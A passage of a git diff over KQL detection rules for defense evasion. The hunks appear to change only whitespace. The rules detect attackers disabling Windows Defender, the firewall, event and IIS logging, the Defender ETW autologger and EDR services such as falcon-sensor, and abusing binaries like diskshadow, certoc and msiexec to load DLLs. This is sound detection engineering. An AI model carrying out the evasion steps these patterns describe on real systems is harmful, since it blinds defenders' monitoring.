"\\SOFTWARE\\Policies\\Microsoft\\Windows Defender Security Center*" or RegistryKey endswith "\\SOFTWARE\\Policies\\Microsoft\\Windows Defender*") and ((RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey endswith "\\DisallowExploitProtectionOverride" or RegistryKey endswith "\\Features\\TamperProtection" or RegistryKey endswith "\\MpEngine\\MpEnablePus" or RegistryKey endswith "\\PUAProtection" or RegistryKey endswith "\\Signature Update\\ForceUpdateFromMU" or RegistryKey endswith "\\SpyNet\\SpynetReporting" or RegistryKey endswith "\\SpyNet\\SubmitSamplesConsent" or RegistryKey endswith "\\Windows Defender Exploit Guard\\Controlled Folder Access\\EnableControlledFolderAccess")) or (RegistryValueData =~ "DWORD (0x00000001)" and (RegistryKey endswith "\\DisableAntiSpyware" or 
RegistryKey endswith "\\DisableAntiVirus" or RegistryKey endswith "\\DisableBehaviorMonitoring" or RegistryKey endswith "\\DisableBlockAtFirstSeen" or RegistryKey endswith "\\DisableEnhancedNotifications" or RegistryKey endswith "\\DisableIntrusionPreventionSystem" or RegistryKey endswith "\\DisableIOAVProtection" or RegistryKey endswith "\\DisableOnAccessProtection" or RegistryKey endswith "\\DisableRealtimeMonitoring" or RegistryKey endswith "\\DisableScanOnRealtimeEnable" or RegistryKey endswith "\\DisableScriptScanning"))) and (not((InitiatingProcessFolderPath endswith "\\sepWscSvc64.exe" and InitiatingProcessFolderPath startswith "C:\\Program Files\\Symantec\\Symantec Endpoint Protection\\"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/disable_windows_event_logging_via_registry.kql b/KQL/rules/Defense Evasion/disable_windows_event_logging_via_registry.kql index e357894c..8a8e498c 100644 --- a/KQL/rules/Defense Evasion/disable_windows_event_logging_via_registry.kql +++ b/KQL/rules/Defense Evasion/disable_windows_event_logging_via_registry.kql 
@@ -1,12 +1,12 @@ -// Title: Disable Windows Event Logging Via Registry -// Author: frack113, Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-07-04 -// Level: high -// Description: Detects tampering with the "Enabled" registry key in order to disable Windows logging of a Windows event channel -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1562.002 -// False Positives: -// - Rare falsepositives may occur from legitimate administrators disabling specific event log for troubleshooting - -DeviceRegistryEvents +// Title: Disable Windows Event Logging Via Registry +// Author: frack113, Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-07-04 +// Level: high +// Description: Detects tampering with the "Enabled" registry key in order to disable Windows logging of a Windows event channel +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.002 +// False Positives: +// - Rare falsepositives may occur from legitimate administrators disabling specific event log for troubleshooting + +DeviceRegistryEvents | where (RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels*" and RegistryKey endswith "\\Enabled") and (not(((InitiatingProcessFolderPath endswith "\\TiWorker.exe" and InitiatingProcessFolderPath startswith "C:\\Windows\\winsxs\\") or (InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\svchost.exe" and (RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels\\Microsoft-Windows-FileInfoMinifilter" or RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels\\Microsoft-Windows-ASN1*" or RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels\\Microsoft-Windows-Kernel-AppCompat*" or RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels\\Microsoft-Windows-Runtime\\Error*" or RegistryKey endswith 
"\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels\\Microsoft-Windows-CAPI2/Operational*")) or (InitiatingProcessFolderPath =~ "C:\\Windows\\servicing\\TrustedInstaller.exe" and RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels\\Microsoft-Windows-Compat-Appraiser") or InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\wevtutil.exe"))) and (not((InitiatingProcessFolderPath =~ "" or isnull(InitiatingProcessFolderPath)))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/disable_windows_firewall_by_registry.kql b/KQL/rules/Defense Evasion/disable_windows_firewall_by_registry.kql index ba01e570..f6313dff 100644 --- a/KQL/rules/Defense Evasion/disable_windows_firewall_by_registry.kql +++ b/KQL/rules/Defense Evasion/disable_windows_firewall_by_registry.kql @@ -1,10 +1,10 @@ -// Title: Disable Windows Firewall by Registry -// Author: frack113 -// Date: 2022-08-19 -// Level: medium -// Description: Detect set EnableFirewall to 0 to disable the Windows firewall -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1562.004 - -DeviceRegistryEvents +// Title: Disable Windows Firewall by Registry +// Author: frack113 +// Date: 2022-08-19 +// Level: medium +// Description: Detect set EnableFirewall to 0 to disable the Windows firewall +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.004 + +DeviceRegistryEvents | where RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey endswith "\\SOFTWARE\\Policies\\Microsoft\\WindowsFirewall\\StandardProfile\\EnableFirewall" or RegistryKey endswith "\\SOFTWARE\\Policies\\Microsoft\\WindowsFirewall\\DomainProfile\\EnableFirewall") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/disable_windows_iis_http_logging.kql b/KQL/rules/Defense Evasion/disable_windows_iis_http_logging.kql index 75cd9ac3..3fed0f88 100644 --- a/KQL/rules/Defense Evasion/disable_windows_iis_http_logging.kql 
+++ b/KQL/rules/Defense Evasion/disable_windows_iis_http_logging.kql
@@ -1,10 +1,10 @@
-// Title: Disable Windows IIS HTTP Logging
-// Author: frack113
-// Date: 2022-01-09
-// Level: high
-// Description: Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union)
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1562.002
-
-DeviceProcessEvents
+// Title: Disable Windows IIS HTTP Logging
+// Author: frack113
+// Date: 2022-01-09
+// Level: high
+// Description: Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.002
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "set" and ProcessCommandLine contains "config" and ProcessCommandLine contains "section:httplogging" and ProcessCommandLine contains "dontLog:true") and (FolderPath endswith "\\appcmd.exe" or ProcessVersionInfoOriginalFileName =~ "appcmd.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/disabled_ie_security_features.kql b/KQL/rules/Defense Evasion/disabled_ie_security_features.kql
index 9e582b93..58810f62 100644
--- a/KQL/rules/Defense Evasion/disabled_ie_security_features.kql
+++ b/KQL/rules/Defense Evasion/disabled_ie_security_features.kql
@@ -1,10 +1,10 @@
-// Title: Disabled IE Security Features
-// Author: Florian Roth (Nextron Systems)
-// Date: 2020-06-19
-// Level: high
-// Description: Detects command lines that indicate unwanted modifications to registry keys that disable important Internet Explorer security features
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1562.001
-
-DeviceProcessEvents
+// Title: Disabled IE Security Features
+// Author: Florian Roth (Nextron Systems)
+// Date: 2020-06-19
+// Level: high
+// Description: Detects command lines that indicate unwanted modifications to registry keys that disable important Internet Explorer security features
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains " -name IEHarden " and ProcessCommandLine contains " -value 0 ") or (ProcessCommandLine contains " -name DEPOff " and ProcessCommandLine contains " -value 1 ") or (ProcessCommandLine contains " -name DisableFirstRunCustomize " and ProcessCommandLine contains " -value 2 ")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/disabled_volume_snapshots.kql b/KQL/rules/Defense Evasion/disabled_volume_snapshots.kql
index 943826de..3156f377 100644
--- a/KQL/rules/Defense Evasion/disabled_volume_snapshots.kql
+++ b/KQL/rules/Defense Evasion/disabled_volume_snapshots.kql
@@ -1,12 +1,12 @@
-// Title: Disabled Volume Snapshots
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021-01-28
-// Level: high
-// Description: Detects commands that temporarily turn off Volume Snapshots
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1562.001
-// False Positives:
-// - Legitimate administration
-
-DeviceProcessEvents
+// Title: Disabled Volume Snapshots
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-01-28
+// Level: high
+// Description: Detects commands that temporarily turn off Volume Snapshots
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+// - Legitimate administration
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "\\Services\\VSS\\Diag" and ProcessCommandLine contains "/d Disabled"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/disabled_windows_defender_eventlog.kql b/KQL/rules/Defense Evasion/disabled_windows_defender_eventlog.kql
index 557e0e64..02500d53 100644
--- a/KQL/rules/Defense Evasion/disabled_windows_defender_eventlog.kql
+++ b/KQL/rules/Defense Evasion/disabled_windows_defender_eventlog.kql
@@ -1,12 +1,12 @@
-// Title: Disabled Windows Defender Eventlog
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022-07-04
-// Level: high
-// Description: Detects the disabling of the Windows Defender eventlog as seen in relation to Lockbit 3.0 infections
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1562.001
-// False Positives:
-// - Other Antivirus software installations could cause Windows to disable that eventlog (unknown)
-
-DeviceRegistryEvents
+// Title: Disabled Windows Defender Eventlog
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-07-04
+// Level: high
+// Description: Detects the disabling of the Windows Defender eventlog as seen in relation to Lockbit 3.0 infections
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+// - Other Antivirus software installations could cause Windows to disable that eventlog (unknown)
+
+DeviceRegistryEvents
 | where RegistryValueData =~ "DWORD (0x00000000)" and RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels\\Microsoft-Windows-Windows Defender/Operational\\Enabled"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/disabling_security_tools.kql b/KQL/rules/Defense Evasion/disabling_security_tools.kql
index 9b31ea17..debc1408 100644
--- a/KQL/rules/Defense Evasion/disabling_security_tools.kql
+++ b/KQL/rules/Defense Evasion/disabling_security_tools.kql
@@ -1,12 +1,12 @@ -// Title: Disabling Security Tools -// Author: Ömer Günal, Alejandro Ortuno, oscd.community -// Date: 2020-06-17 -// Level: medium -// Description: Detects disabling security tools -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1562.004 -// False Positives: -// - Legitimate administration activities - -DeviceProcessEvents +// Title: Disabling Security Tools +// Author: Ömer Günal, Alejandro Ortuno, oscd.community +// Date: 2020-06-17 +// Level: medium +// Description: Detects disabling security tools +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.004 +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents | where ((ProcessCommandLine contains "cbdaemon" and ProcessCommandLine contains "stop") and FolderPath endswith "/service") or ((ProcessCommandLine contains "cbdaemon" and ProcessCommandLine contains "off") and FolderPath endswith "/chkconfig") or ((ProcessCommandLine contains "cbdaemon" and ProcessCommandLine contains "stop") and FolderPath endswith "/systemctl") or ((ProcessCommandLine contains "cbdaemon" and ProcessCommandLine contains "disable") and FolderPath endswith "/systemctl") or ((ProcessCommandLine contains "stop" and ProcessCommandLine contains "falcon-sensor") and FolderPath endswith "/systemctl") or ((ProcessCommandLine contains "disable" and ProcessCommandLine contains "falcon-sensor") and FolderPath endswith "/systemctl") or ((ProcessCommandLine contains "firewalld" and ProcessCommandLine contains "stop") and FolderPath endswith "/systemctl") or ((ProcessCommandLine contains "firewalld" and ProcessCommandLine contains "disable") and FolderPath endswith "/systemctl") or ((ProcessCommandLine contains "iptables" and ProcessCommandLine contains "stop") and FolderPath endswith "/service") or ((ProcessCommandLine contains "ip6tables" and ProcessCommandLine contains "stop") and FolderPath endswith "/service") or ((ProcessCommandLine contains 
"iptables" and ProcessCommandLine contains "stop") and FolderPath endswith "/chkconfig") or ((ProcessCommandLine contains "ip6tables" and ProcessCommandLine contains "stop") and FolderPath endswith "/chkconfig") or (ProcessCommandLine contains "0" and FolderPath endswith "/setenforce") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/disabling_windows_defender_wmi_autologger_session_via_reg_exe.kql b/KQL/rules/Defense Evasion/disabling_windows_defender_wmi_autologger_session_via_reg_exe.kql index f54e7ec6..ba2035a6 100644 --- a/KQL/rules/Defense Evasion/disabling_windows_defender_wmi_autologger_session_via_reg_exe.kql +++ b/KQL/rules/Defense Evasion/disabling_windows_defender_wmi_autologger_session_via_reg_exe.kql 
@@ -1,14 +1,14 @@ -// Title: Disabling Windows Defender WMI Autologger Session via Reg.exe -// Author: Matt Anderson (Huntress) -// Date: 2025-07-09 -// Level: high -// Description: Detects the use of reg.exe to disable the Event Tracing for Windows (ETW) Autologger session for Windows Defender API and Audit events. -// By setting the 'Start' value to '0' for the 'DefenderApiLogger' or 'DefenderAuditLogger' session, an attacker can prevent these critical security events -// from being logged, effectively blinding monitoring tools that rely on this data. This is a powerful defense evasion technique. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1562.001 -// False Positives: -// - Highly unlikely - -DeviceProcessEvents +// Title: Disabling Windows Defender WMI Autologger Session via Reg.exe +// Author: Matt Anderson (Huntress) +// Date: 2025-07-09 +// Level: high +// Description: Detects the use of reg.exe to disable the Event Tracing for Windows (ETW) Autologger session for Windows Defender API and Audit events. +// By setting the 'Start' value to '0' for the 'DefenderApiLogger' or 'DefenderAuditLogger' session, an attacker can prevent these critical security events +// from being logged, effectively blinding monitoring tools that rely on this data. This is a powerful defense evasion technique. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Highly unlikely + +DeviceProcessEvents | where ((FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe") and (ProcessCommandLine contains "add" and ProcessCommandLine contains "0") and (ProcessCommandLine contains "\\Control\\WMI\\Autologger\\DefenderApiLogger\\Start" or ProcessCommandLine contains "\\Control\\WMI\\Autologger\\DefenderAuditLogger\\Start")) and (not(ProcessCommandLine contains "0x00000001")) \ No newline at end of file 
diff --git a/KQL/rules/Defense Evasion/diskshadow_script_mode_execution_from_potential_suspicious_location.kql b/KQL/rules/Defense Evasion/diskshadow_script_mode_execution_from_potential_suspicious_location.kql index e2dab757..c0c7f665 100644 --- a/KQL/rules/Defense Evasion/diskshadow_script_mode_execution_from_potential_suspicious_location.kql +++ b/KQL/rules/Defense Evasion/diskshadow_script_mode_execution_from_potential_suspicious_location.kql 
@@ -1,12 +1,12 @@ -// Title: Diskshadow Script Mode - Execution From Potential Suspicious Location -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-09-15 -// Level: medium -// Description: Detects execution of "Diskshadow.exe" in script mode using the "/s" flag where the script is located in a potentially suspicious location. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218 -// False Positives: -// - False positives may occur if you execute the script from one of the paths mentioned in the rule. Apply additional filters that fits your org needs. - -DeviceProcessEvents +// Title: Diskshadow Script Mode - Execution From Potential Suspicious Location +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-09-15 +// Level: medium +// Description: Detects execution of "Diskshadow.exe" in script mode using the "/s" flag where the script is located in a potentially suspicious location. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 +// False Positives: +// - False positives may occur if you execute the script from one of the paths mentioned in the rule. Apply additional filters that fits your org needs. + +DeviceProcessEvents | where (ProcessCommandLine contains "-s " or ProcessCommandLine contains "/s " or ProcessCommandLine contains "–s " or ProcessCommandLine contains "—s " or ProcessCommandLine contains "―s ") and (ProcessVersionInfoOriginalFileName =~ "diskshadow.exe" or FolderPath endswith "\\diskshadow.exe") and (ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains "\\AppData\\Local\\" or ProcessCommandLine contains "\\AppData\\Roaming\\" or ProcessCommandLine contains "\\ProgramData\\" or ProcessCommandLine contains "\\Users\\Public\\") \ No newline at end of file 
diff --git a/KQL/rules/Defense Evasion/diskshadow_script_mode_uncommon_script_extension_execution.kql b/KQL/rules/Defense Evasion/diskshadow_script_mode_uncommon_script_extension_execution.kql index b860c395..8082d4a6 100644 --- a/KQL/rules/Defense Evasion/diskshadow_script_mode_uncommon_script_extension_execution.kql +++ b/KQL/rules/Defense Evasion/diskshadow_script_mode_uncommon_script_extension_execution.kql 
@@ -1,13 +1,13 @@ -// Title: Diskshadow Script Mode - Uncommon Script Extension Execution -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-09-15 -// Level: medium -// Description: Detects execution of "Diskshadow.exe" in script mode to execute an script with a potentially uncommon extension. -// Initial baselining of the allowed extension list is required. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218 -// False Positives: -// - False postitve might occur with legitimate or uncommon extensions used internally. Initial baseline is required. - -DeviceProcessEvents +// Title: Diskshadow Script Mode - Uncommon Script Extension Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-09-15 +// Level: medium +// Description: Detects execution of "Diskshadow.exe" in script mode to execute an script with a potentially uncommon extension. +// Initial baselining of the allowed extension list is required. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 +// False Positives: +// - False postitve might occur with legitimate or uncommon extensions used internally. Initial baseline is required. + +DeviceProcessEvents | where ((ProcessCommandLine contains "-s " or ProcessCommandLine contains "/s " or ProcessCommandLine contains "–s " or ProcessCommandLine contains "—s " or ProcessCommandLine contains "―s ") and (ProcessVersionInfoOriginalFileName =~ "diskshadow.exe" or FolderPath endswith "\\diskshadow.exe")) and (not(ProcessCommandLine contains ".txt")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/dism_remove_online_package.kql b/KQL/rules/Defense Evasion/dism_remove_online_package.kql index e8b6f687..028a7b0b 100644 --- a/KQL/rules/Defense Evasion/dism_remove_online_package.kql +++ b/KQL/rules/Defense Evasion/dism_remove_online_package.kql 
@@ -1,12 +1,12 @@ -// Title: Dism Remove Online Package -// Author: frack113 -// Date: 2022-01-16 -// Level: medium -// Description: Deployment Image Servicing and Management tool. DISM is used to enumerate, install, uninstall, configure, and update features and packages in Windows images -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1562.001 -// False Positives: -// - Legitimate script - -DeviceProcessEvents +// Title: Dism Remove Online Package +// Author: frack113 +// Date: 2022-01-16 +// Level: medium +// Description: Deployment Image Servicing and Management tool. DISM is used to enumerate, install, uninstall, configure, and update features and packages in Windows images +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Legitimate script + +DeviceProcessEvents | where ((ProcessCommandLine contains "/Online" and ProcessCommandLine contains "/Disable-Feature") and FolderPath endswith "\\Dism.exe") or (FolderPath endswith "\\DismHost.exe" and (InitiatingProcessCommandLine contains "/Online" and InitiatingProcessCommandLine contains "/Disable-Feature")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/displaying_hidden_files_feature_disabled.kql b/KQL/rules/Defense Evasion/displaying_hidden_files_feature_disabled.kql index fb2e098b..bdd3ff47 100644 --- a/KQL/rules/Defense Evasion/displaying_hidden_files_feature_disabled.kql +++ b/KQL/rules/Defense Evasion/displaying_hidden_files_feature_disabled.kql 
@@ -1,11 +1,11 @@ -// Title: Displaying Hidden Files Feature Disabled -// Author: frack113 -// Date: 2022-04-02 -// Level: medium -// Description: Detects modifications to the "Hidden" and "ShowSuperHidden" explorer registry values in order to disable showing of hidden files and system files. -// This technique is abused by several malware families to hide their files from normal users. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1564.001 - -DeviceRegistryEvents +// Title: Displaying Hidden Files Feature Disabled +// Author: frack113 +// Date: 2022-04-02 +// Level: medium +// Description: Detects modifications to the "Hidden" and "ShowSuperHidden" explorer registry values in order to disable showing of hidden files and system files. +// This technique is abused by several malware families to hide their files from normal users. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1564.001 + +DeviceRegistryEvents | where RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\ShowSuperHidden" or RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Hidden") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/dll_execution_via_rasautou_exe.kql b/KQL/rules/Defense Evasion/dll_execution_via_rasautou_exe.kql index 0b96f7e1..19aecc3b 100644 --- a/KQL/rules/Defense Evasion/dll_execution_via_rasautou_exe.kql +++ b/KQL/rules/Defense Evasion/dll_execution_via_rasautou_exe.kql 
@@ -1,12 +1,12 @@ -// Title: DLL Execution via Rasautou.exe -// Author: Julia Fomina, oscd.community -// Date: 2020-10-09 -// Level: medium -// Description: Detects using Rasautou.exe for loading arbitrary .DLL specified in -d option and executes the export specified in -p. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218 -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: DLL Execution via Rasautou.exe +// Author: Julia Fomina, oscd.community +// Date: 2020-10-09 +// Level: medium +// Description: Detects using Rasautou.exe for loading arbitrary .DLL specified in -d option and executes the export specified in -p. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 +// False Positives: +// - Unlikely + +DeviceProcessEvents | where (ProcessCommandLine contains " -d " and ProcessCommandLine contains " -p ") and (FolderPath endswith "\\rasautou.exe" or ProcessVersionInfoOriginalFileName =~ "rasdlui.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/dll_load_by_system_process_from_suspicious_locations.kql b/KQL/rules/Defense Evasion/dll_load_by_system_process_from_suspicious_locations.kql index b19e2c39..a5fdf8f1 100644 --- a/KQL/rules/Defense Evasion/dll_load_by_system_process_from_suspicious_locations.kql +++ b/KQL/rules/Defense Evasion/dll_load_by_system_process_from_suspicious_locations.kql 
@@ -1,10 +1,10 @@ -// Title: DLL Load By System Process From Suspicious Locations -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-07-17 -// Level: medium -// Description: Detects when a system process (i.e. located in system32, syswow64, etc.) loads a DLL from a suspicious location or a location with permissive permissions such as "C:\Users\Public" -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1070 - -DeviceImageLoadEvents +// Title: DLL Load By System Process From Suspicious Locations +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-07-17 +// Level: medium +// Description: Detects when a system process (i.e. located in system32, syswow64, etc.) loads a DLL from a suspicious location or a location with permissive permissions such as "C:\Users\Public" +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1070 + +DeviceImageLoadEvents | where (FolderPath startswith "C:\\Users\\Public\\" or FolderPath startswith "C:\\PerfLogs\\") and InitiatingProcessFolderPath startswith "C:\\Windows\\" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/dll_loaded_from_suspicious_location_via_cmspt_exe.kql b/KQL/rules/Defense Evasion/dll_loaded_from_suspicious_location_via_cmspt_exe.kql index 281b5027..0c9a11c2 100644 --- a/KQL/rules/Defense Evasion/dll_loaded_from_suspicious_location_via_cmspt_exe.kql +++ b/KQL/rules/Defense Evasion/dll_loaded_from_suspicious_location_via_cmspt_exe.kql 
@@ -1,12 +1,12 @@ -// Title: DLL Loaded From Suspicious Location Via Cmspt.EXE -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-08-30 -// Level: high -// Description: Detects cmstp loading "dll" or "ocx" files from suspicious locations -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218.003 -// False Positives: -// - Unikely - -DeviceImageLoadEvents +// Title: DLL Loaded From Suspicious Location Via Cmspt.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-30 +// Level: high +// Description: Detects cmstp loading "dll" or "ocx" files from suspicious locations +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.003 +// False Positives: +// - Unikely + +DeviceImageLoadEvents | where (FolderPath contains "\\PerfLogs\\" or FolderPath contains "\\ProgramData\\" or FolderPath contains "\\Users\\" or FolderPath contains "\\Windows\\Temp\\" or FolderPath contains "C:\\Temp\\") and (FolderPath endswith ".dll" or FolderPath endswith ".ocx") and InitiatingProcessFolderPath endswith "\\cmstp.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/dll_loaded_via_certoc_exe.kql b/KQL/rules/Defense Evasion/dll_loaded_via_certoc_exe.kql index ec54306b..e3a7c280 100644 --- a/KQL/rules/Defense Evasion/dll_loaded_via_certoc_exe.kql +++ b/KQL/rules/Defense Evasion/dll_loaded_via_certoc_exe.kql 
@@ -1,10 +1,10 @@ -// Title: DLL Loaded via CertOC.EXE -// Author: Austin Songer @austinsonger -// Date: 2021-10-23 -// Level: medium -// Description: Detects when a user installs certificates by using CertOC.exe to loads the target DLL file. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218 - -DeviceProcessEvents +// Title: DLL Loaded via CertOC.EXE +// Author: Austin Songer @austinsonger +// Date: 2021-10-23 +// Level: medium +// Description: Detects when a user installs certificates by using CertOC.exe to loads the target DLL file. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 + +DeviceProcessEvents | where (ProcessCommandLine contains " -LoadDLL " or ProcessCommandLine contains " /LoadDLL " or ProcessCommandLine contains " –LoadDLL " or ProcessCommandLine contains " —LoadDLL " or ProcessCommandLine contains " ―LoadDLL ") and (FolderPath endswith "\\certoc.exe" or ProcessVersionInfoOriginalFileName =~ "CertOC.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/dll_sideloading_of_shellchromeapi_dll.kql b/KQL/rules/Defense Evasion/dll_sideloading_of_shellchromeapi_dll.kql index c92d3b14..347799d8 100644 --- a/KQL/rules/Defense Evasion/dll_sideloading_of_shellchromeapi_dll.kql +++ b/KQL/rules/Defense Evasion/dll_sideloading_of_shellchromeapi_dll.kql 
@@ -1,11 +1,11 @@ -// Title: DLL Sideloading Of ShellChromeAPI.DLL -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-12-01 -// Level: high -// Description: Detects processes loading the non-existent DLL "ShellChromeAPI". One known example is the "DeviceEnroller" binary in combination with the "PhoneDeepLink" flag tries to load this DLL. -// Adversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001 - -DeviceImageLoadEvents +// Title: DLL Sideloading Of ShellChromeAPI.DLL +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-12-01 +// Level: high +// Description: Detects processes loading the non-existent DLL "ShellChromeAPI". One known example is the "DeviceEnroller" binary in combination with the "PhoneDeepLink" flag tries to load this DLL. +// Adversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001 + +DeviceImageLoadEvents | where FolderPath endswith "\\ShellChromeAPI.dll" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/dllunregisterserver_function_call_via_msiexec_exe.kql b/KQL/rules/Defense Evasion/dllunregisterserver_function_call_via_msiexec_exe.kql index 7873c4fd..30d51c9c 100644 --- a/KQL/rules/Defense Evasion/dllunregisterserver_function_call_via_msiexec_exe.kql +++ b/KQL/rules/Defense Evasion/dllunregisterserver_function_call_via_msiexec_exe.kql 
@@ -1,10 +1,10 @@ -// Title: DllUnregisterServer Function Call Via Msiexec.EXE -// Author: frack113 -// Date: 2022-04-24 -// Level: medium -// Description: Detects MsiExec loading a DLL and calling its DllUnregisterServer function -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218.007 - -DeviceProcessEvents +// Title: DllUnregisterServer Function Call Via Msiexec.EXE +// Author: frack113 +// Date: 2022-04-24 +// Level: medium +// Description: Detects MsiExec loading a DLL and calling its DllUnregisterServer function +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.007 + +DeviceProcessEvents | where ProcessCommandLine contains ".dll" and (ProcessCommandLine contains " -z " or ProcessCommandLine contains " /z " or ProcessCommandLine contains " –z " or ProcessCommandLine contains " —z " or ProcessCommandLine contains " ―z ") and (FolderPath endswith "\\msiexec.exe" or ProcessVersionInfoOriginalFileName =~ "\\msiexec.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/dotnet_clr_dll_loaded_by_scripting_applications.kql b/KQL/rules/Defense Evasion/dotnet_clr_dll_loaded_by_scripting_applications.kql index 9a12ae14..c35cf26f 100644 --- a/KQL/rules/Defense Evasion/dotnet_clr_dll_loaded_by_scripting_applications.kql +++ b/KQL/rules/Defense Evasion/dotnet_clr_dll_loaded_by_scripting_applications.kql 
